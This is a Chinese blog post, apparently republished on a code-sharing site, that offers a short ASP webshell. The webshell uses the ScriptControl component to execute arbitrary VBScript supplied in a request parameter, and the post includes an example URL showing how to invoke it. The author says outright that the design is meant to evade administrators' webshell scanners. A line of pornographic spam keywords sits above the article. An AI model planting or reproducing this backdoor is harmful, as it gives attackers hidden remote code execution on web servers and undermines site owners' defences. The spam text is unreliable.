欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一個(gè)較新的ASP后門服務(wù)端實(shí)現(xiàn)代碼

 更新時(shí)間:2010年10月11日 01:17:53   作者:  
一直很奇怪,為什么客戶端里面不是eval,就是execute,不管我藏哪里,管理員用個(gè)什么XX webshell掃描器,就能踢我屁股了。
今天重新研究了下VB里面的ScriptControl組件,發(fā)現(xiàn)asp里面也能調(diào)用。研究了下方法,后來(lái)和lcx討論了下。得到了如下代碼,在此感謝前輩的指點(diǎn),呵呵。

代碼很簡(jiǎn)單,我就不多做解釋了,以免有人罵我裝。

復(fù)制代碼 代碼如下:

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數(shù)SubCode作為過(guò)程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數(shù)名e 調(diào)用之,同時(shí)壓入6個(gè)基對(duì)象作為參數(shù)

'調(diào)用示例:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
%>


注意,雖然能用了,但是實(shí)驗(yàn)發(fā)現(xiàn)只有l(wèi)ake2客戶端能用。希望有牛人出來(lái)改得通用一點(diǎn)。呵呵。自己寫個(gè)客戶端專用也不錯(cuò)。


轉(zhuǎn)自:http://hi.baidu.com/ylbhz/blog

相關(guān)文章

最新評(píng)論